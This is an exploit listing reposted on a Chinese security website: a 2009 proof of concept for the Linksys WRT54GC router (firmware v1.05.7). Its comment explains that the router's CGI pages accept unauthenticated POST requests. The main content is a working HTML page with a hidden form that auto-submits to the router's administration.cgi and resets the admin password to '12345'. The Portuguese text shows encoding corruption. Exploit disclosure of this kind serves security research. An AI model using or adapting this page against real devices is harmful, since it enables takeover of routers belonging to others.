首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linksys WRT54GC - Administration Password Change exploit
来源:www.falandodeseguranca.com 作者:Gabriel 发布时间:2009-04-21  

<!--
***************
* Gabriel Lima - gabriel@falandodeseguranca.com
* www.falandodeseguranca.com
***************

(English:)
        Linksys WRT54GC - Administration Password Change
The Router WRT54GC doesn't seem to check authentication from the administrator in it's .CGI files, accepting any POST
request,
as a password change. Below, follows an example of a form that changes the password and administrator login to '12345'.
Tested on model Linksys WRT54GC - Firmware Version: v1.05.7 - Local and Remote administration


(Portugu阺:)
        Linksys WRT54GC - Mudan鏰 de Senha
O roteador WRT54GC parece n鉶 verificar a autentica玢o do administrador em seus arquivos .CGI, aceitando qualquer envio
de POST como o de mudan鏰 de senha. Abaixo, um exemplo de formul醨io que muda a senha e o login de administrador para
12345.
Testado no modelo Linksys WRT54GC - Firmware Version: v1.05.7 - Administra玢o Local e remota.


Credits:
Gabriel Lima. gabriel@falandodeseguranca.com
-->

<html><body>
<form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>

<!-- C骴igo de envio autom醫ico do formul醨io -->

<SCRIPT language="JavaScript">
  document.senha.submit();
</SCRIPT>

</body></html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·eLitius 1.0 Arbitrary Database
·TotalCalendar 2.4 Remote Passw
·Exploits Trend Micro OfficeSca
·e107 <= 0.7.15 (extended_user_
·Dokeos LMS <= 1.8.5 (whoisonli
·WysGui CMS 1.2b (Insecure Cook
·Oracle RDBMS 10.2.0.3/11.1.0.6
·Addonics NAS Adapter (bts.cgi)
·Zervit Webserver 0.3 Remote De
·CoolPlayer Portable 2.19.1 (.m
·Xitami Web Server <= 5.0 Remot
·Pligg 9.9.0 (editlink.php id)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved